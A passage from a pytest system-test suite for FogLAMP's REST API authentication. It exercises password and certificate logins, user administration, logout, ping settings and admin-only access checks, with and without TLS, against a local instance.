'message': 'User has been created successfully'}),
])
def test_create_user_with_password_token(self, foglamp_url, form_data, expected_values):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/admin/user", body=json.dumps(form_data),
headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any2", "password": "User@123"}, {'user': {'userName': 'any2', 'userId': 5, 'roleId': 2},
'message': 'User has been created successfully'}),
({"username": "admin2", "password": "F0gl@mp!", "role_id": 1},
{'user': {'userName': 'admin2', 'userId': 6, 'roleId': 1},
'message': 'User has been created successfully'}),
])
def test_create_user_with_certificate_token(self, foglamp_url, form_data, expected_values):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/admin/user", body=json.dumps(form_data),
headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "User@123"}, 'Logged in successfully'),
({"username": "admin1", "password": "F0gl@mp!"}, 'Logged in successfully'),
({"username": "any2", "password": "User@123"}, 'Logged in successfully'),
({"username": "admin2", "password": "F0gl@mp!"}, 'Logged in successfully')
])
def test_login_of_newly_created_user(self, foglamp_url, form_data, expected_values):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc['message']
def test_update_password_with_password_token(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", "/foglamp/user/any1/password", body=json.dumps({"current_password": "User@123",
"new_password": "F0gl@mp1"}),
headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'Password has been updated successfully for user id:<3>'} == jdoc
def test_update_password_with_certificate_token(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", "/foglamp/user/any2/password", body=json.dumps({"current_password": "User@123",
"new_password": "F0gl@mp2"}),
headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'Password has been updated successfully for user id:<5>'} == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "F0gl@mp1"}, 'Logged in successfully'),
({"username": "any2", "password": "F0gl@mp2"}, 'Logged in successfully')
])
def test_login_with_updated_password(self, foglamp_url, form_data, expected_values):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc['message']
def test_reset_user_with_password_token(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", "/foglamp/admin/3/reset", body=json.dumps({"role_id": 1, "password": "F0gl@mp!#1"}),
headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'User with id:<3> has been updated successfully'} == jdoc
def test_reset_user_with_certificate_token(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", "/foglamp/admin/5/reset", body=json.dumps({"role_id": 1, "password": "F0gl@mp!#2"}),
headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'User with id:<5> has been updated successfully'} == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "F0gl@mp!#1"}, 'Logged in successfully'),
({"username": "any2", "password": "F0gl@mp!#2"}, 'Logged in successfully')
])
def test_login_with_resetted_password(self, foglamp_url, form_data, expected_values):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc['message']
def test_delete_user_with_password_token(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("DELETE", "/foglamp/admin/4/delete", headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': "User has been deleted successfully"} == jdoc
def test_delete_user_with_certificate_token(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("DELETE", "/foglamp/admin/6/delete", headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': "User has been deleted successfully"} == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "admin1", "password": "F0gl@mp!"}, ""),
({"username": "admin2", "password": "F0gl@mp!"}, "")
])
def test_login_of_deleted_user(self, foglamp_url, form_data, expected_values):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
r = conn.getresponse()
assert 404 == r.status
assert "User does not exist" == r.reason
def test_logout_all_with_password_token(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/1/logout', headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert jdoc['logout']
def test_verify_logout(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", '/foglamp/asset', headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 401 == r.status
def test_admin_actions_forbidden_for_regular_user_with_pwd_token(self, foglamp_url):
"""Test that regular user is not able to perform any actions that only an admin can"""
# Login with regular user
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert not jdoc['admin']
_token = jdoc["token"]
# Create User
conn.request("POST", "/foglamp/admin/user", body=json.dumps({"username": "other",
"password": "User@123"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
# Reset User
conn.request("PUT", "/foglamp/admin/2/reset", body=json.dumps({"role_id": 1, "password": "F0gl@p!"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
# Delete User
conn.request("DELETE", "/foglamp/admin/2/delete", headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
def test_admin_actions_forbidden_for_regular_user_with_cert_token(self, foglamp_url):
"""Test that regular user is not able to perform any actions that only an admin can"""
# Login with regular user
conn = http.client.HTTPConnection(foglamp_url)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/user.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert not jdoc['admin']
_token = jdoc["token"]
# Create User
conn.request("POST", "/foglamp/admin/user", body=json.dumps({"username": "other",
"password": "User@123"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
# Reset User
conn.request("PUT", "/foglamp/admin/2/reset", body=json.dumps({"role_id": 1, "password": "F0gl@p!"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
# Delete User
conn.request("DELETE", "/foglamp/admin/2/delete", headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
@pytest.mark.skip(reason="Currently this feature is not implemented.")
def test_regular_user_access_to_admin_api_config(self, foglamp_url):
pass
class TestAuthPasswordWithoutTLS:
def test_login_username_regular_user(self, reset_foglamp, change_to_auth_mandatory_password,
foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert not jdoc['admin']
global PASSWORD_TOKEN
PASSWORD_TOKEN = jdoc["token"]
def test_logout_me(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/logout', headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert jdoc['logout']
def test_login_with_invalid_credentials_regular_user(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "Foglamp"}))
r = conn.getresponse()
assert 404 == r.status
assert "Username or Password do not match" == r.reason
def test_login_username_admin(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert jdoc['admin']
global PASSWORD_TOKEN
PASSWORD_TOKEN = jdoc["token"]
def test_login_with_invalid_credentials_admin(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "FOGLAMP"}))
r = conn.getresponse()
assert 404 == r.status
assert "Username or Password do not match" == r.reason
def test_login_with_admin_certificate(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 400 == r.status
assert "Use a valid username and password to login." == r.reason
def test_ping_with_allow_ping_true(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 0 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ingest(self, foglamp_url, wait_time):
add_south_http(foglamp_url, HTTP_SOUTH_SVC_NAME, PASSWORD_TOKEN, wait_time, tls_enabled=False)
generate_json_for_fogbench(ASSET_NAME)
send_data_using_fogbench(wait_time)
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 10 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ping_with_allow_ping_false(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
_token = jdoc["token"]
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/category/rest_api', body=json.dumps({"allowPing": "false"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/logout', headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
assert 403 == r.status
assert "Forbidden" == r.reason
@pytest.mark.parametrize(("query", "expected_values"), [
('', {'users': [{'userId': 1, 'roleId': 1, 'userName': 'admin'},
{'userId': 2, 'roleId': 2, 'userName': 'user'}]}),
('?id=2', {'userId': 2, 'roleId': 2, 'userName': 'user'}),
('?username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
('?id=1&username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
])
def test_get_users(self, foglamp_url, query, expected_values):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/user{}".format(query), headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
def test_get_roles(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/user/role", headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'roles': [{'description': 'All CRUD privileges', 'id': 1, 'name': 'admin'},
{'description': 'All CRUD operations and self profile management',
'id': 2, 'name': 'user'}]} == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "User@123"}, {'user': {'userName': 'any1', 'userId': 3, 'roleId': 2},
'message': 'User has been created successfully'}),
({"username": "admin1", "password": "F0gl@mp!", "role_id": 1},
{'user': {'userName': 'admin1', 'userId': 4, 'roleId': 1},
'message': 'User has been created successfully'}),
])
def test_create_user(self, foglamp_url, form_data, expected_values):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/admin/user", body=json.dumps(form_data),
headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "User@123"}, 'Logged in successfully'),
({"username": "admin1", "password": "F0gl@mp!"}, 'Logged in successfully')
])
def test_login_of_newly_created_user(self, foglamp_url, form_data, expected_values):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc['message']
def test_update_password(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", "/foglamp/user/any1/password", body=json.dumps({"current_password": "User@123",
"new_password": "F0gl@mp1"}),
headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'Password has been updated successfully for user id:<3>'} == jdoc
def test_login_with_updated_password(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", body=json.dumps({"username": "any1", "password": "F0gl@mp1"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert 'Logged in successfully' == jdoc['message']
def test_reset_user(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", "/foglamp/admin/3/reset", body=json.dumps({"role_id": 1, "password": "F0gl@mp!"}),
headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'User with id:<3> has been updated successfully'} == jdoc
def test_login_with_resetted_password(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", body=json.dumps({"username": "any1", "password": "F0gl@mp!"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert 'Logged in successfully' == jdoc['message']
def test_delete_user(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("DELETE", "/foglamp/admin/4/delete", headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': "User has been deleted successfully"} == jdoc
def test_login_of_deleted_user(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", body=json.dumps({"username": "admin1", "password": "F0gl@mp!"}))
r = conn.getresponse()
assert 404 == r.status
assert "User does not exist" == r.reason
def test_logout_all(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/1/logout', headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert jdoc['logout']
def test_verify_logout(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", '/foglamp/asset', headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 401 == r.status
def test_admin_actions_forbidden_for_regular_user(self, foglamp_url):
"""Test that regular user is not able to perform any actions that only an admin can"""
# Login with regular user
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert not jdoc['admin']
_token = jdoc["token"]
# Create User
conn.request("POST", "/foglamp/admin/user", body=json.dumps({"username": "other",
"password": "User@123"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
# Reset User
conn.request("PUT", "/foglamp/admin/2/reset", body=json.dumps({"role_id": 1, "password": "F0gl@p!"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
# Delete User
conn.request("DELETE", "/foglamp/admin/2/delete", headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
@pytest.mark.skip(reason="Currently this feature is not implemented.")
def test_regular_user_access_to_admin_api_config(self, foglamp_url):
pass
class TestAuthCertificateWithoutTLS:
def test_login_with_user_certificate(self, foglamp_url, reset_foglamp,
change_to_auth_mandatory_certificate):
conn = http.client.HTTPConnection(foglamp_url)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/user.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert not jdoc['admin']
def test_login_with_admin_certificate(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert jdoc['admin']
global CERT_TOKEN
CERT_TOKEN = jdoc["token"]
def test_login_with_custom_certificate(self, foglamp_url, remove_data_file):
# Create a custom certificate and sign
try:
subprocess.run(["openssl genrsa -out custom.key 1024 2> /dev/null"], shell=True)
subprocess.run(["openssl req -new -key custom.key -out custom.csr -subj '/C=IN/CN=user' 2> /dev/null"],
shell=True)
subprocess.run(["openssl x509 -req -days 1 -in custom.csr "
"-CA $FOGLAMP_ROOT/data/etc/certs/ca.cert -CAkey $FOGLAMP_ROOT/data/etc/certs/ca.key "
"-set_serial 01 -out custom.cert 2> /dev/null"], shell=True)
except subprocess.CalledProcessError:
assert False, " Certificate creation failed!"
# Login with custom certificate
conn = http.client.HTTPConnection(foglamp_url)
cert_file_path = 'custom.cert'
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert not jdoc['admin']
# Delete Certificates and keys created
remove_data_file('custom.key')
remove_data_file('custom.csr')
remove_data_file('custom.cert')
def test_login_with_invalid_credentials(self, foglamp_url, remove_data_file):
try:
subprocess.run(["echo 'Foglamp certificate' > template.cert"], shell=True)
except subprocess.CalledProcessError:
assert False, " Certificate creation failed!"
# Login with custom certificate
conn = http.client.HTTPConnection(foglamp_url)
cert_file_path = 'template.cert'
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 400 == r.status
assert 'Use a valid certificate to login.' == r.reason
# Delete Certificates and keys created
remove_data_file('template.cert')
def test_login_username_admin(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
r = conn.getresponse()
assert 400 == r.status
assert "Use a valid certificate to login." == r.reason
def test_ping_with_allow_ping_true(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 0 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ingest(self, foglamp_url, wait_time):
add_south_http(foglamp_url, HTTP_SOUTH_SVC_NAME, CERT_TOKEN, wait_time, tls_enabled=False)
generate_json_for_fogbench(ASSET_NAME)
send_data_using_fogbench(wait_time)
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 10 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ping_with_allow_ping_false(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
_token = jdoc["token"]
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/category/rest_api', json.dumps({"allowPing": "false"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/logout', headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
assert 403 == r.status
assert "Forbidden" == r.reason
@pytest.mark.parametrize(("query", "expected_values"), [
('', {'users': [{'userId': 1, 'roleId': 1, 'userName': 'admin'},
{'userId': 2, 'roleId': 2, 'userName': 'user'}]}),
('?id=2', {'userId': 2, 'roleId': 2, 'userName': 'user'}),
('?username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
('?id=1&username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
])
def test_get_users(self, foglamp_url, query, expected_values):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/user{}".format(query), headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
def test_get_roles(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/user/role", headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'roles': [{'description': 'All CRUD privileges', 'id': 1, 'name': 'admin'},
{'description': 'All CRUD operations and self profile management',
'id': 2, 'name': 'user'}]} == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "User@123"}, {'user': {'userName': 'any1', 'userId': 3, 'roleId': 2},
'message': 'User has been created successfully'}),
({"username": "admin1", "password": "F0gl@mp!", "role_id": 1},
{'user': {'userName': 'admin1', 'userId': 4, 'roleId': 1},
'message': 'User has been created successfully'}),
])
def test_create_user(self, foglamp_url, form_data, expected_values):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/admin/user", body=json.dumps(form_data),
headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
def test_update_password(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", "/foglamp/user/any1/password", body=json.dumps({"current_password": "User@123",
"new_password": "F0gl@mp1"}),
headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'Password has been updated successfully for user id:<3>'} == jdoc
def test_reset_user(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", "/foglamp/admin/3/reset", body=json.dumps({"role_id": 1, "password": "F0gl@mp!"}),
headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'User with id:<3> has been updated successfully'} == jdoc
def test_delete_user(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("DELETE", "/foglamp/admin/4/delete", headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': "User has been deleted successfully"} == jdoc
def test_logout_all(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/1/logout', headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert jdoc['logout']
def test_verify_logout(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", '/foglamp/asset', headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 401 == r.status
def test_admin_actions_forbidden_for_regular_user(self, foglamp_url):
"""Test that regular user is not able to perform any actions that only an admin can"""
# Login with regular user
conn = http.client.HTTPConnection(foglamp_url)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/user.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert not jdoc['admin']
_token = jdoc["token"]
# Create User
conn.request("POST", "/foglamp/admin/user", body=json.dumps({"username": "other",
"password": "User@123"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
# Reset User
conn.request("PUT", "/foglamp/admin/2/reset", body=json.dumps({"role_id": 1, "password": "F0gl@p!"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
# Delete User
conn.request("DELETE", "/foglamp/admin/2/delete", headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
@pytest.mark.skip(reason="Currently this feature is not implemented.")
def test_regular_user_access_to_admin_api_config(self, foglamp_url):
pass
class TestTLSEnabled:
def test_on_default_port(self, reset_foglamp, enable_tls, foglamp_url, wait_time):
enable_tls(foglamp_url, wait_time, auth=None)
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "uptime" in jdoc
assert 0 < jdoc['uptime'], "FogLAMP not up."
def test_on_custom_port(self, wait_time):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/category/rest_api', json.dumps({"httpsPort": "2005"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "httpsPort" in jdoc
assert '2005' == jdoc['httpsPort']['value']
# FIXME: Remove this wait time
time.sleep(wait_time)
conn.request("PUT", '/foglamp/restart', json.dumps({}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "FogLAMP restart has been scheduled." == jdoc['message']
time.sleep(wait_time * 2)
conn = http.client.HTTPSConnection("localhost", 2005, context=context)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "uptime" in jdoc
assert 0 < jdoc['uptime'], "FogLAMP not up."
class TestAuthAnyWithTLS:
def test_login_regular_user_using_password(self, reset_foglamp, change_to_auth_mandatory_any,
generate_password_based_auth_token, enable_tls,
foglamp_url, wait_time):
auth = 'password'
enable_tls(foglamp_url, wait_time, auth)
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert not jdoc['admin']
global PASSWORD_TOKEN
PASSWORD_TOKEN = jdoc["token"]
def test_logout_me_password_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/logout', headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert jdoc['logout']
def test_login_with_invalid_credentials_regular_user_using_password(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "Foglamp"}))
r = conn.getresponse()
assert 404 == r.status
assert "Username or Password do not match" == r.reason
def test_login_username_admin_using_password(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert jdoc['admin']
global PASSWORD_TOKEN
PASSWORD_TOKEN = jdoc["token"]
def test_login_with_invalid_credentials_admin_using_password(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "FOGLAMP"}))
r = conn.getresponse()
assert 404 == r.status
assert "Username or Password do not match" == r.reason
def test_login_with_user_certificate(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
